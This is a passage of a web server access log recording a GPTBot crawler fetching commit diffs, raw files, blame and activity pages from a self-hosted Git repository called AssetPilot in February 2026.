"/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 68307] [Gzip 10.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:13:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 23743] [Gzip 15.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:13:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/actions" [Client 74.7.227.38] [Length 7415] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:13:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity" [Client 74.7.227.38] [Length 8596] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:13:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 68072] [Gzip 10.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 68075] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 68199] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/watchers" [Client 74.7.227.38] [Length 7740] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:13:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 74.7.227.38] [Length 11115] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:13:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" [Client 74.7.227.38] [Length 16244] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:13:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" [Client 74.7.227.38] [Length 11427] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:13:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 74.7.227.38] [Length 7521] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:13:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/releases" [Client 74.7.227.38] [Length 7424] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/forks" +[17/Feb/2026:13:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 28967] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/halfweekly" [Client 74.7.227.38] [Length 8390] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" +[17/Feb/2026:13:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/contributors" [Client 74.7.227.38] [Length 7620] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" +[17/Feb/2026:13:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/semiyearly" [Client 74.7.227.38] [Length 8604] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" +[17/Feb/2026:13:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/code-frequency" [Client 74.7.227.38] [Length 7540] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" +[17/Feb/2026:13:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/activity/quarterly" [Client 74.7.227.38] [Length 8601] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/activity" +[17/Feb/2026:13:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" +[17/Feb/2026:13:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12456] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12760] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" +[17/Feb/2026:13:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10840] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" +[17/Feb/2026:13:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16162] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13436] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" +[17/Feb/2026:13:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10115] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14282] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker" +[17/Feb/2026:13:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 14309] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" +[17/Feb/2026:13:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" [Client 74.7.227.38] [Length 10167] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" +[17/Feb/2026:13:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 15802] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument" +[17/Feb/2026:13:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:49:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14876] [Gzip 9.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:49:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259725] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:49:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15460] [Gzip 8.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" +[17/Feb/2026:13:49:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11881] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:49:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:13:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 18155] [Gzip 12.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:49:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9956] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:13:49:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" +[17/Feb/2026:13:49:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/claude.md" +[17/Feb/2026:13:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10174] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" +[17/Feb/2026:13:49:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" +[17/Feb/2026:13:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16440] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates" +[17/Feb/2026:13:49:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:49:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16607] [Gzip 8.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:49:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 22886] [Gzip 13.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 